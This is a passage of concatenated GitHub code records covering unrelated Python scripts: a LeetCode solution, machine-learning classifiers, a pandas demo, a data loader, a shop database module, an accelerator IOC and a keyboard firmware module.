# execute the status function based on statusType\n # statusType is defined in the instrument.py file\n try:\n instrumentStatus.myDict['Instrument'] = instrumentStatus.instr\n response = instrumentStatus.types[instrumentStatus.statusType]()\n except Exception as e:\n log.error('error executing the status type: ' + str(e))\n response = {'APIStatus':'ERROR', 'Message':f\"error executing the status type '{statusType}'\"}\n else:\n print(response)\n return json.dumps(response)\n\n","repo_name":"KeckObservatoryArchive/ingestionAPI","sub_path":"tpx_status.py","file_name":"tpx_status.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20281299495","text":"from utils.ll import *\n\n\ndef removeNthFromEnd(head, n):\n dummy = ListNode(0, head)\n slow = dummy\n fast = head\n for _ in range(n):\n fast = fast.next\n while fast:\n slow = slow.next\n fast = fast.next\n slow.next = slow.next.next\n return dummy.next\n\n\nif __name__ == \"__main__\":\n head = InitLinkList([1, 2, 3, 4, 5, 6])\n res = removeNthFromEnd(head, 3)\n ForeachLinkList(res)\n","repo_name":"tantan1379/TRT_backup","sub_path":"Leetcode/19. Remove Nth Node From End of List.py","file_name":"19. 
Remove Nth Node From End of List.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16521793156","text":"## load adjmatrix\nimport scipy.io as sio\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras import layers\nimport matplotlib.pyplot as plt\nfrom keras.layers import Dropout\nfrom keras.layers import Dense, Activation, Dropout, LSTM,Bidirectional,GRU\nfrom keras.optimizers import Adam, SGD\nfrom keras.callbacks import EarlyStopping\nfrom keras.callbacks import ReduceLROnPlateau\nfrom keras import regularizers\nfrom sklearn.preprocessing import StandardScaler\nfrom keras.preprocessing.sequence import pad_sequences\n\n\nfrom keras.regularizers import l2#\n\nfold=10\ntunelength=30\nonetimelogacc=[]\nonetimesvmacc=[]\nonetimeDNNacc=[]\n\n\n\ncvtimes=1\ncvnum=1\n\n\nload_fn=str(\".\\\\NCI1\\\\NCI1cv{}traintimes{}.mat\".format(cvnum,cvtimes) )\n\ndata = sio.loadmat(load_fn)\nNCIlabelandsequence=data['trainlabelandsequence']\nNCItrainsequence=NCIlabelandsequence[:,1:112]\nNCItrainlabel=NCIlabelandsequence[:,0]\nNCItrainlabel=np.asarray(NCItrainlabel,'int64')\n#load test data\n\nload_fn2=str(\".\\\\NCI1\\\\NCI1cv{}testtimes{}.mat\".format(cvnum,cvtimes) )\ndata2 = sio.loadmat(load_fn2)\nNCIlabelandsequence2=data2['testlabelandsequence']\nNCItestsequence=NCIlabelandsequence2[:,1:112]\nNCItestlabel=NCIlabelandsequence2[:,0]\nNCItestlabel=np.asarray(NCItestlabel,'int64')\n\n\n\n# fix random seed for reproducibility\nseed = 7\nnp.random.seed(seed)\n\n# padding operation\nx_train=NCItrainsequence\nx_test=NCItestsequence\ny_train=NCItrainlabel\ny_test=NCItestlabel\n\nx_train=pad_sequences(x_train,truncating='post',maxlen=tunelength) \nx_test=pad_sequences(x_test,truncating='post',maxlen=tunelength)\n\n# Standardized operation\n\nsc = StandardScaler()\nsc.fit(x_train)\nx_train_std = sc.transform(x_train)\nx_test_std = sc.transform(x_test)\n\n\"\"\"\nmodel1:logisticRegression\n\"\"\"\nfrom sklearn.linear_model import LogisticRegression\nclassifier=LogisticRegression(solver='liblinear',multi_class='ovr',max_iter=1000,verbose=1, n_jobs=1)\nclassifier.fit(x_train_std,y_train)\ny_predict=classifier.predict(x_test_std)\nscore=classifier.score(x_test_std,y_test)\nprint(\"Accuracy\", score)\nonetimelogacc.append(score)\n\"\"\"\nmodel2:svm\n\"\"\"\n\nfrom sklearn import svm\nmodel=svm.SVC(kernel='rbf',max_iter=1000)\nmodel.fit(x_train_std,y_train)\nscore2=model.score(x_test_std,y_test)\nprint(\"Accuracy\", score2)\nonetimesvmacc.append(score2)\n\n##########################\n\n# Deep neural network on keras platform \n###########################\n\nmodel=Sequential()\nmodel.add(layers.Dense(64,input_dim=tunelength,activation='relu',kernel_regularizer=regularizers.l2(0.001)))\nmodel.add(layers.Dense(32,activation='relu',kernel_regularizer=regularizers.l2(0.001)))\nmodel.add(layers.Dense(16,activation='relu',kernel_regularizer=regularizers.l2(0.001)))\nmodel.add(layers.Dense(1,activation='sigmoid'))\n\nopt=Adam(lr=0.001)\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', patience=10, verbose=1,factor=0.1, min_lr=0.000000001,mode='auto') #learning rate decrease\n\nmodel.compile(loss='binary_crossentropy',optimizer=opt,metrics=['accuracy'])\nmodel.summary()\nhistory=model.fit(x_train_std,y_train,\n\t\t\t\t epochs=300,\n\t\t\t\t verbose=True,\n# validation_split=0.1,\n\t\t\t\t callbacks=[reduce_lr],\n\t\t\t\t validation_data=(x_test,y_test),\n\t\t\t\t 
batch_size=50)\nloss,accuracy1=model.evaluate(x_train_std,y_train,verbose=0)\nprint(\"Training Accuracy: {:.4f}\".format(accuracy1))\nloss,accuracy2=model.evaluate(x_test_std,y_test,verbose=0)\nprint(\"Test Accuracy: {:.4f}\".format(accuracy2))\nonetimeDNNacc.append(accuracy2)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"lbtjackbluce/Biogc","sub_path":"Example1-coding-NCI1/ClassifierNCI1.py","file_name":"ClassifierNCI1.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30508811179","text":"import numpy as np \nimport pandas as pd\n\nS1 = np.array ([10000,3000,6000,np.nan,3000,1500,np.nan,9500,1580])\nS2 = np.array ([7,np.nan,5,8,12,np.nan,np.nan,2,3])\nS3 = np.array ([np.nan,12,5,6,14,7,np.nan,2,31])\nS4 = np.array ([\"BT\",\"BT\",\"IK\",\"IK\",\"IK\",\"IK\",\"BT\",\"BT\",\"BT\"])\ndf = pd.DataFrame(\n {\n \"Maas\" : S1, \n \"S2\" : S2,\n \"S3\" : S3,\n \"Dep\" : S4\n }\n)\nprint(df )\nprint(df.groupby(\"Dep\")[\"Maas\"].mean())\n \ndf = (df[\"Maas\"].fillna(df.groupby(\"Dep\")[\"Maas\"].transform(\"mean\"))) \nprint(df)\n ","repo_name":"samilyilmaz26/pythonDersleri","sub_path":"12-VeriAnaliz/4-VeriIsleme/4_CatKirilimAtama/proje.py","file_name":"proje.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6561088868","text":"from statiskit import linalg, core\n\nimport unittest\nfrom nose.plugins.attrib import attr\n\n@attr(linux=True,\n osx=True,\n win=True,\n level=1)\nclass TestMultinormal(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Test multinormal distribution construction\"\"\"\n cls._dist = core.MultinormalDistribution(linalg.Vector([0., 0., 0.]), linalg.Matrix([[1.0, 0.0, 0.0],\n [0.0, 1.0, 0.0],\n [0.0, 0.0, 1.0]]))\n\n def test_simulation(self):\n \"\"\"Test multinormal distribution simulation\"\"\"\n data = self._dist.simulation(20)\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Test distribution deletion\"\"\"\n del cls._dist","repo_name":"Global-localhost/Core-2","sub_path":"test/test_multinormal.py","file_name":"test_multinormal.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"33191669359","text":"import numpy as np\nfrom insects import *\nfrom image_treatment import *\n\n\n# 获取一个批次内样本随机缩放的尺寸\ndef get_img_size(mode): # 此函数的作用是将训练集或验证集中的图片尺寸随机缩放\n if (mode == 'train') or (mode == 'valid'):\n inds = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\n ii = np.random.choice(inds)\n img_size = 320 + ii * 32\n else:\n img_size = 608\n return img_size\n\n\n# a=get_img_size('train')\n# print(a)\n\n\n# 将 list形式的batch数据 转化成多个array构成的tuple\ndef make_array(batch_data): # 将batch_data中的数据分别取出\n img_array = np.array([item[0] for item in batch_data], dtype='float32')\n gt_box_array = np.array([item[1] for item in batch_data], dtype='float32')\n gt_labels_array = np.array([item[2] for item in batch_data], dtype='int32')\n img_scale = np.array([item[3] for item in batch_data], dtype='int32')\n return img_array, gt_box_array, gt_labels_array, img_scale\n\n\n# 批量读取数据,同一批次内图像的尺寸大小必须是一样的,\n# 不同批次之间的大小是随机的,\n# 由上面定义的get_img_size函数产生\ndef data_loader(datadir, batch_size=10, mode='train'):\n cname2cid = get_insect_names()\n records = get_annotations(cname2cid, datadir)\n\n def reader():\n if mode == 'train':\n np.random.shuffle(records) # 将records中的record顺序打乱\n batch_data = []\n img_size = 
get_img_size(mode) # 获取一个批次内样本随机缩放的尺寸\n for record in records:\n # print(record)\n img, gt_bbox, gt_labels, im_shape = get_img_data(record,\n size=img_size)\n batch_data.append((img, gt_bbox, gt_labels, im_shape))\n if len(batch_data) == batch_size:\n yield make_array(batch_data)\n batch_data = []\n img_size = get_img_size(mode)\n if len(batch_data) > 0:\n yield make_array(batch_data)\n\n return reader\n\n\n# d = data_loader('./insects/train', batch_size=2, mode='train')\n# img, gt_boxes, gt_labels, im_shape = next(d())\n# print(img.shape, gt_boxes.shape, gt_labels.shape, im_shape)\n# 测试数据读取\n\n# 将 list形式的batch数据 转化成多个array构成的tuple\ndef make_test_array(batch_data):\n img_name_array = np.array([item[0] for item in batch_data])\n img_data_array = np.array([item[1] for item in batch_data], dtype = 'float32')\n img_scale_array = np.array([item[2] for item in batch_data], dtype='int32')\n return img_name_array, img_data_array, img_scale_array\n\n# 测试数据读取\ndef test_data_loader(datadir, batch_size= 10, test_image_size=608, mode='test'):\n \"\"\"\n 加载测试用的图片,测试数据没有groundtruth标签\n \"\"\"\n image_names = os.listdir(datadir)\n def reader():\n batch_data = []\n img_size = test_image_size\n for image_name in image_names:\n file_path = os.path.join(datadir, image_name)\n img = cv2.imread(file_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n H = img.shape[0]\n W = img.shape[1]\n img = cv2.resize(img, (img_size, img_size))\n\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n mean = np.array(mean).reshape((1, 1, -1))\n std = np.array(std).reshape((1, 1, -1))\n out_img = (img / 255.0 - mean) / std\n out_img = out_img.astype('float32').transpose((2, 0, 1))\n img = out_img #np.transpose(out_img, (2,0,1))\n im_shape = [H, W]\n\n batch_data.append((image_name.split('.')[0], img, im_shape))\n if len(batch_data) == batch_size:\n yield make_test_array(batch_data)\n batch_data = []\n if len(batch_data) > 0:\n yield make_test_array(batch_data)\n\n return reader\n# d = test_data_loader('./insects/test/images',mode='test')\n# img, gt_boxes, gt_labels = next(d())\n# print(img.shape, gt_boxes.shape, gt_labels.shape)","repo_name":"SCUTyusong/yolov3-pytorch","sub_path":"data_read.py","file_name":"data_read.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73163170400","text":"from outputformat.title import boxtitle\nfrom outputformat.title import linetitle\nfrom outputformat import tools\n\n\ndef showlist(data, style=\"bullet\", title=False, return_str=False, precision=4):\n \"\"\"Show each item of a given list.\n\n Parameters\n ----------\n data : list\n List of items to display. Anything passed here will be converted to list\n\n style : string, default: 'bullet'\n How items are displayed. 
Options are: 'bullet', 'line', 'box', 'ordinal'\n 'bullet' or '*': Simple bullet points\n 'line' or '-': Line under the title, connected to the items\n 'box': Title with a box decoration\n 'ordinal' or '#': Shows a numbered list in ascending order\n\n In case any other string is passed, it will be used as marker\n For example:\n >>> showlist([\"Item A\", \"Item B\", \"Item C\"], style=\"~>\")\n ~> Item A\n ~> Item B\n ~> Item C\n\n title : string, optional\n Title to be displayed before the list.\n In case 'title = False', the 'line' and 'box' styles give the same result\n\n return_str : Bool, default: False\n If True, returns a string instead of printing.\n\n Returns\n -------\n string\n Only returns in case 'return_str = True', otherwise None\n\n \"\"\"\n\n # Start outputstring\n outputstring = \"\"\n\n # Prepare and clean data\n data = tools.prepare_data(data, precision=precision)\n\n # Get markers and title\n markers = tools.get_markers_and_title(style, title)\n marker_first, marker_middle, marker_last, title = markers\n\n # Add title, if we have one\n if title:\n outputstring += f\"{title}\\n\"\n\n # Add list items\n for idx in range(len(data)):\n\n marker = tools.decide_marker(\n idx, marker_first, marker_middle, marker_last, style, data\n )\n\n # Generate string for this item\n outputstring += f\"{marker} {data[idx]}\\n\"\n\n if return_str:\n return outputstring\n else:\n print(outputstring)\n","repo_name":"delestro/outputformat","sub_path":"outputformat/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"54"} +{"seq_id":"8222443633","text":"from bd import obtener_conexion\n\n\ndef listaUsuario():\n conecxion = obtener_conexion()\n usuarios = []\n with conecxion.cursor() as cursor:\n cursor.execute(\n 'SELECT usuarios.Codigo ,usuarios.nombresCompletos,usuarios.numeroCelular,usuarios.cuenta FROM tienda.usuarios')\n usuarios = cursor.fetchall()\n conecxion.close()\n return usuarios\n\n\ndef Agregar_usario(nombresCompletos, numeroCelular, cuenta):\n conecxion = obtener_conexion()\n with conecxion.cursor() as cursor:\n cursor.execute(\"INSERT INTO usuarios(nombresCompletos,numeroCelular,cuenta)VALUES(%s,%s,%s)\",\n (nombresCompletos, numeroCelular, cuenta))\n conecxion.commit()\n conecxion.close()\n\n\ndef buscar(numeroCelular):\n conecxion = obtener_conexion()\n usuarios = []\n with conecxion.cursor() as cursor:\n cursor.execute(\n 'SELECT u.Codigo,u.nombresCompletos,u.numeroCelular,u.cuenta FROM tienda.usuarios as u WHERE u.numeroCelular=%s', (numeroCelular,))\n usuarios = cursor.fetchall()\n conecxion.commit()\n conecxion.close()\n return usuarios\n\n\ndef edit(numeroCelular):\n conecxion = obtener_conexion()\n usuario = None\n with conecxion.cursor() as cursor:\n cursor.execute(\n 'SELECT usuarios.Codigo as Codigo, usuarios.nombresCompletos as nombresClompletos,usuarios.numeroCelular as numeroCelular,usuarios.cuenta as cuenta FROM tienda.usuarios WHERE numeroCelular=%s', (numeroCelular))\n usuario = cursor.fetchone()\n conecxion.close()\n return usuario\n\n\ndef actualizar(nombresCompletos, numeroCelular, cuenta, Codigo):\n conexion = obtener_conexion()\n with conexion.cursor() as cursor:\n cursor.execute(\"UPDATE tienda.usuarios SET nombresCompletos=%s, numeroCelular=%s , cuenta=%s WHERE Codigo=%s\",\n (nombresCompletos, numeroCelular, cuenta, Codigo))\n conexion.commit()\n conexion.close()\n\n\ndef edit_suma(numeroCelular):\n conecxion = obtener_conexion()\n usuarios 
= []\n with conecxion.cursor() as cursor:\n cursor.execute(\n 'SELECT u.Codigo,u.nombresCompletos,u.numeroCelular,u.cuenta FROM tienda.usuarios as u WHERE u.numeroCelular=%s', (numeroCelular,))\n usuarios = cursor.fetchone()\n conecxion.commit()\n conecxion.close()\n return usuarios\n\n\ndef guardarSuma(cuenta, numeroCelular):\n conexion = obtener_conexion()\n with conexion.cursor() as cursor:\n cursor.execute(\n 'UPDATE tienda.usuarios SET cuenta=%s WHERE numeroCelular=%s', (cuenta, numeroCelular))\n conexion.commit()\n conexion.close()\n\n\ndef eliminar(numeroCelular):\n conexion = obtener_conexion()\n with conexion.cursor() as cursor:\n cursor.execute(\n 'DELETE from usuarios Where numeroCelular=%s', (numeroCelular))\n conexion.commit()\n conexion.close()\n","repo_name":"stivencv7/Tienda","sub_path":"controladores/controlador_tienda.py","file_name":"controlador_tienda.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18183769242","text":"dict={\r\n \"name\":\"sagar\",\r\n \"class\":\"10th\",\r\n \"marks\":[20,20,50],\r\n \"avg\":30,\r\n \"another_dict\":{'name':'rahul','class':'11th'}, # another dict in the main dict\r\n 1: 2 # it is also a key:value pair\r\n}\r\nprint(dict.keys()) # it print keys of a dictionary\r\nprint(type(dict.keys())) # it print type which is a dictionary type\r\nprint(list(dict.keys())) # it print keys value as alist ,it is also called type_conversion\r\nprint(dict.values()) # it print value of a dictionary\r\nprint(dict.items()) # it print the dictionary in form tupples\r\nupdate_dict={\"score\":\"100\",\"century\":\"02\"\r\n}\r\ndict.update(update_dict)# here we first create a dict and then,we update it\r\nprint(dict)\r\nprint(dict.get(\"avg\")) # it also gives value but if that key is not present,it retrn none\r\n# whereas print(dict[\"avg\"]) throws an error if key not present","repo_name":"sagarglbitm/python-3.9","sub_path":"chapter_5/02_dict_methods.py","file_name":"02_dict_methods.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3329411700","text":"\"\"\"Main application.\"\"\"\n\nimport time as _time\nimport logging as _log\n\nfrom pcaspy import Alarm as _Alarm\nfrom pcaspy import Severity as _Severity\n\nimport siriuspy as _siriuspy\nimport siriuspy.util as _util\n\nfrom siriuspy.thread import LoopQueueThread as _LoopQueueThread, \\\n RepeaterThread as _RepeaterThread\nfrom siriuspy.namesys import SiriusPVName as _SiriusPVName\n\nfrom siriuspy.devices import PSProperty as _PSProperty\nfrom siriuspy.devices import StrengthConv as _StrengthConv\n\n\n__version__ = _util.get_last_commit_hash()\n\n\n# update frequency of strength PVs\nUPDATE_FREQ = 10.0 # [Hz]\n\n\nclass App:\n \"\"\"Responsible for updating the IOC database.\n\n Update values and parameters such as alarms.\n \"\"\"\n\n def __init__(self, driver, psnames, dbset, prefix):\n \"\"\"Create Power Supply controllers.\"\"\"\n self._driver = driver\n\n # write operation queue\n self._queue_write = _LoopQueueThread(is_cathread=True)\n self._queue_write.start()\n\n # mapping device to bbb\n self._psnames = [_SiriusPVName(psn) for psn in psnames]\n\n # print info about the IOC\n _siriuspy.util.print_ioc_banner(\n ioc_name='AS_PU_Conv',\n db=dbset,\n description='AS PU Conversion IOC',\n version=__version__,\n prefix=prefix)\n\n # build connectors and streconv dicts\n self._connectors, 
self._streconvs = \\\n self._create_connectors_and_streconv()\n\n # scan thread\n self._interval = 1 / UPDATE_FREQ\n self._thread_scan = _RepeaterThread(\n self._interval, self.scan, niter=0, is_cathread=True)\n self._thread_scan.start()\n\n # --- public interface ---\n\n @property\n def driver(self):\n \"\"\"Pcaspy driver.\"\"\"\n return self._driver\n\n @property\n def psnames(self):\n \"\"\"Return list of psnames.\"\"\"\n return self._psnames\n\n def check_connected(self, psname):\n \"\"\"Return connection status.\"\"\"\n streconv = self._streconvs[psname]\n conns = self._connectors[psname]\n if not streconv.connected:\n return False\n for conn in conns.values():\n if not conn.connected:\n return False\n return True\n\n def process(self):\n \"\"\"Process all write requests in queue and does a BBB scan.\"\"\"\n t0_ = _time.time()\n\n qsize = self._queue_write.qsize()\n if qsize > 2:\n logmsg = f'[Q] - write queue size is large: {qsize}'\n _log.warning(logmsg)\n\n dt_ = self._interval - (_time.time() - t0_)\n _time.sleep(max(dt_, 0))\n\n def read(self, reason):\n \"\"\"Read from database.\"\"\"\n _ = reason\n return None\n\n def write(self, reason, value):\n \"\"\"Enqueue write request.\"\"\"\n _log.info(\"[{:.2s}] - {:.36s} = {:.50s}\".format(\n 'W ', reason, str(value)))\n pvname = _SiriusPVName(reason)\n self.driver.setParam(reason, value)\n self.driver.updatePV(reason)\n self._queue_write.put(\n (self._write_operation, (pvname, value)), block=False)\n\n def scan(self):\n \"\"\"Scan all devices\"\"\"\n for psname in self.psnames:\n self.scan_device(psname)\n\n def scan_device(self, psname):\n \"\"\"Scan device and update ioc epics DB.\"\"\"\n # not connected\n if not self.check_connected(psname):\n conns = self._connectors[psname]\n for proptype in conns.keys():\n reason = psname.substitute(\n propty_name=psname.propty_name+'Kick',\n propty_suffix=proptype)\n self.driver.setParamStatus(\n reason, _Alarm.NO_ALARM, _Severity.NO_ALARM)\n return\n\n # all connected, calculate strengths\n streconv = self._streconvs[psname]\n conn = self._connectors[psname]\n limits = conn['SP'].limits\n curr0 = conn['SP'].value\n curr1 = conn['RB'].value\n curr2 = conn['Mon'].value\n curr3 = limits[0]\n curr4 = limits[-1]\n\n # NOTE: temporary fix\n if curr3 != curr3:\n curr3 = 0\n if curr4 != curr4:\n curr4 = 10000\n\n values = (curr0, curr1, curr2, curr3, curr4)\n # NOTE: investigate!\n #\n # usr/local/lib/python3.6/site-packages/epics/ca.py:1507:\n # UserWarning: ca.get('SI-01SA:PU-InjNLKckr:Voltage-Mon') timed out\n # after 1.00 seconds.\n # sirius-ioc-as-pu-conv.py[11332]: warnings.warn(msg %\n # (name(chid), timeout))\n # File \"/usr/local/lib/python3.6/site-packages/siriuspy/magnet/excdata.py\",\n # line 173, in _calc_interp\n # xvals, xtab, ytab, left=float('nan'), right=float('inf'))\n # File \"<__array_function__ internals>\", line 6, in interp\n # File \"/usr/local/lib/python3.6/site-packages/numpy/lib/function_base.py\",\n # line 1403, in interp\n # sirius-ioc-as-pu-conv.py[11332]: return interp_func(x, xp, fp, left, right)\n # TypeError: Cannot cast array data from dtype('O') to dtype('float64')\n # according to the rule 'safe'\n try:\n strengths = streconv.conv_current_2_strength(values)\n except TypeError:\n _log.error('Could not convert voltage to strength!')\n strengths = None\n\n if strengths is None or None in strengths:\n slims = None\n else:\n slims = strengths[-2:]\n if slims[0] > slims[1]:\n slims = slims[1], slims[0]\n\n # update SP, RB and Mon epics database\n for i, proptype in 
enumerate(conn.keys()):\n reason = psname.substitute(\n propty_name=psname.propty_name+'Kick',\n propty_suffix=proptype)\n if slims is None:\n self.driver.setParamStatus(\n reason, _Alarm.TIMEOUT_ALARM, _Severity.INVALID_ALARM)\n else:\n # update value\n self.driver.setParam(reason, strengths[i])\n # update limits\n kwargs = self.driver.getParamInfo(reason)\n kwargs.update({\n 'lolim': slims[0], 'low': slims[0], 'lolo': slims[0],\n 'hihi': slims[1], 'high': slims[1], 'hilim': slims[1]})\n self.driver.setParamInfo(reason, kwargs)\n # update alarm\n self.driver.setParamStatus(\n reason, _Alarm.NO_ALARM, _Severity.NO_ALARM)\n # update PV info\n self.driver.updatePV(reason)\n\n # --- private methods ---\n\n def _create_connectors_and_streconv(self):\n connectors = dict()\n streconv = dict()\n for psname in self.psnames:\n connectors[psname] = dict()\n conn = connectors[psname]\n conn['SP'] = _PSProperty(psname, propty='Voltage-SP')\n conn['RB'] = _PSProperty(psname, propty='Voltage-RB')\n conn['Mon'] = _PSProperty(psname, propty='Voltage-Mon')\n streconv[psname] = _StrengthConv(psname, proptype='Ref-Mon')\n return connectors, streconv\n\n def _write_operation(self, pvname, value):\n t0_ = _time.time()\n psname = pvname.device_name\n if 'CCoil' in pvname:\n psname += ':' + pvname.propty_name.split('Kick')[0]\n streconv = self._streconvs[psname]\n voltage = streconv.conv_strength_2_current(value)\n conn = self._connectors[psname]['SP']\n if conn.connected:\n self._connectors[psname]['SP'].value = voltage\n t1_ = _time.time()\n _log.info(\"[{:.2s}] - {:.36s} : {:.50s}\".format(\n 'T ', pvname,\n 'write operation took {:.3f} ms'.format((t1_-t0_)*1000)))\n","repo_name":"lnls-sirius/machine-applications","sub_path":"as-pu-conv/as_pu_conv/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7746,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"38995131719","text":"def solution(routes):\n answer = 1\n routes.sort(key = lambda x : (x[1], x[0]))\n base = routes[0][1]\n for route in routes:\n start, end = route\n if start <= base <= end:\n continue\n base = end\n answer += 1\n \n return answer","repo_name":"soominnn/Algorithms","sub_path":"Programmers/단속카메라.py","file_name":"단속카메라.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22307732864","text":"import os\nimport pickle\n\nimport util\n\n\nclass ScoreManager:\n best_scores = {}\n run_scores = {}\n\n filename = 'scores.dat'\n\n def save(self):\n for level_name, score in self.run_scores.iteritems():\n if level_name not in self.best_scores or score < self.best_scores[level_name]:\n self.best_scores[level_name] = score\n with open(self.filename, 'wb') as f:\n pickle.dump(self.best_scores, f)\n\n def load(self):\n self.run_scores.clear()\n if os.path.exists(self.filename):\n with open(self.filename, 'rb') as f:\n self.best_scores = pickle.load(f)\n\n def log_score(self, level_name, score):\n if level_name in self.run_scores:\n self.run_scores[level_name] += score\n else:\n self.run_scores[level_name] = score\n\n def get_record(self, mode, level_name):\n return self.best_scores.get(util.get_filename(mode, level_name), -1)\n","repo_name":"TheCornerPiece/JulyGame","sub_path":"scripts/score_manager.py","file_name":"score_manager.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} 
+{"seq_id":"11872259840","text":"#/usr/bin/python\n\n####################\n# Name: Jason Holman\n# A#: A01895834\n####################\n\n# deleted row 662 from AIPiCar/PI_CAR_DATA3/PI_Car_Runs.csv\n# maximum value in inputs is 340\n\nfrom network import *\nimport csv\nimport numpy as np\nimport os\nimport pickle as cPickle\n\ndef process_csv(directory):\n input = []\n output = []\n for dirname, dirnames, filenames in os.walk(directory):\n for f in filenames:\n if f.endswith('.csv'):\n path = os.path.join(dirname, f)\n with open(path) as f:\n csv_reader = csv.reader(f, delimiter=',')\n line_count = 0\n for line in csv_reader:\n if line_count == 0:\n line_count += 1\n else:\n input.append(create_input(eval(line[2]), eval(line[3]), eval(line[4]), eval(line[5])))\n output.append(create_output(line[1]))\n return zip(input, output)\n\n\ndef create_output(output):\n commands = []\n for x in output.split(','):\n if x == 'up pressed':\n commands.append(1)\n elif x == 'right pressed':\n commands.append(2)\n elif x == 'left pressed':\n commands.append(3)\n elif x == 'down pressed':\n commands.append(4)\n if len(commands) == 0:\n commands.append(1)\n if commands[0] == 1:\n e = np.zeros((4, 1))\n e[0] = 1\n return e\n elif commands[0] == 2:\n e = np.zeros((4, 1))\n e[1] = 1\n return e\n elif commands[0] == 3:\n e = np.zeros((4, 1))\n e[2] = 1\n return e\n elif commands[0] == 4:\n e = np.zeros((4, 1))\n e[3] = 1\n return e\n\n\ndef create_input(x_left, x_right, slope_left, slope_right):\n inputs = np.array([x_left, x_right, slope_left, slope_right])\n inputs = inputs / 340.0\n inputs = np.reshape(inputs, (4, 1))\n return inputs\n\n\ndef train_ann(net, eta, mini_batch, num_epochs, lmbda, train_d, test_d, path):\n net.SGD(train_d, num_epochs, mini_batch, eta, lmbda, test_d,\n monitor_evaluation_cost=False,\n monitor_evaluation_accuracy=True,\n monitor_training_cost=False,\n monitor_training_accuracy=True)\n save(net, path)\n\n\ndef save(net, file_name):\n with open(file_name, 'wb') as fp:\n cPickle.dump(net, fp)\n\n\ndef load(file_name):\n with open(file_name, 'rb') as fp:\n nn = cPickle.load(fp)\n return nn\n\n\ndef main():\n data = process_csv('AIPiCar')\n image_ann = Network([4, 95, 45, 4], CrossEntropyCost)\n random.shuffle(data)\n train_data = data[int(len(data)*.1):]\n test_data = data[:int(len(data)*.1)]\n print('Data prepared starting training process')\n train_ann(image_ann, .25, 10, 10, 2.0, train_data, test_data, 'pck_nets/lines_ann.pck')\n train_ann(image_ann, .1, 10, 10, 2.0, train_data, test_data, 'pck_nets/lines_ann.pck')\n train_ann(image_ann, .01, 10, 10, 2.0, train_data, test_data, 'pck_nets/lines_ann.pck')\n\n net = load('pck_nets/lines_ann.pck')\n print(test_data[0][1])\n print(np.argmax(net.feedforward(test_data[0][0])))\n print(net.feedforward(test_data[0][0]))\n\n\nmain()\n","repo_name":"holmanjr/Project02","sub_path":"lines_ann.py","file_name":"lines_ann.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9775639002","text":"from random import randint\n\nfrom kmk.keys import make_argumented_key\nfrom kmk.modules import Module\n\n\nclass RapidFireMeta:\n def __init__(\n self,\n kc,\n interval=100,\n timeout=200,\n enable_interval_randomization=False,\n randomization_magnitude=15,\n toggle=False,\n ):\n self.kc = kc\n self.interval = interval\n self.timeout = timeout\n self.enable_interval_randomization = enable_interval_randomization\n self.randomization_magnitude = 
randomization_magnitude\n self.toggle = toggle\n\n\nclass RapidFire(Module):\n _active_keys = {}\n _toggled_keys = []\n _waiting_keys = []\n\n def __init__(self):\n make_argumented_key(\n validator=RapidFireMeta,\n names=('RF',),\n on_press=self._rf_pressed,\n on_release=self._rf_released,\n )\n\n def _get_repeat(self, key):\n if key.meta.enable_interval_randomization:\n return key.meta.interval + randint(\n -key.meta.randomization_magnitude, key.meta.randomization_magnitude\n )\n return key.meta.interval\n\n def _on_timer_timeout(self, key, keyboard):\n keyboard.tap_key(key.meta.kc)\n if key in self._waiting_keys:\n self._waiting_keys.remove(key)\n if key.meta.toggle and key not in self._toggled_keys:\n self._toggled_keys.append(key)\n self._active_keys[key] = keyboard.set_timeout(\n self._get_repeat(key), lambda: self._on_timer_timeout(key, keyboard)\n )\n\n def _rf_pressed(self, key, keyboard, *args, **kwargs):\n if key in self._toggled_keys:\n self._toggled_keys.remove(key)\n self._deactivate_key(key, keyboard)\n return\n if key.meta.timeout > 0:\n keyboard.tap_key(key.meta.kc)\n self._waiting_keys.append(key)\n self._active_keys[key] = keyboard.set_timeout(\n key.meta.timeout, lambda: self._on_timer_timeout(key, keyboard)\n )\n else:\n self._on_timer_timeout(key, keyboard)\n\n def _rf_released(self, key, keyboard, *args, **kwargs):\n if key not in self._active_keys:\n return\n if key in self._toggled_keys:\n if key not in self._waiting_keys:\n return\n 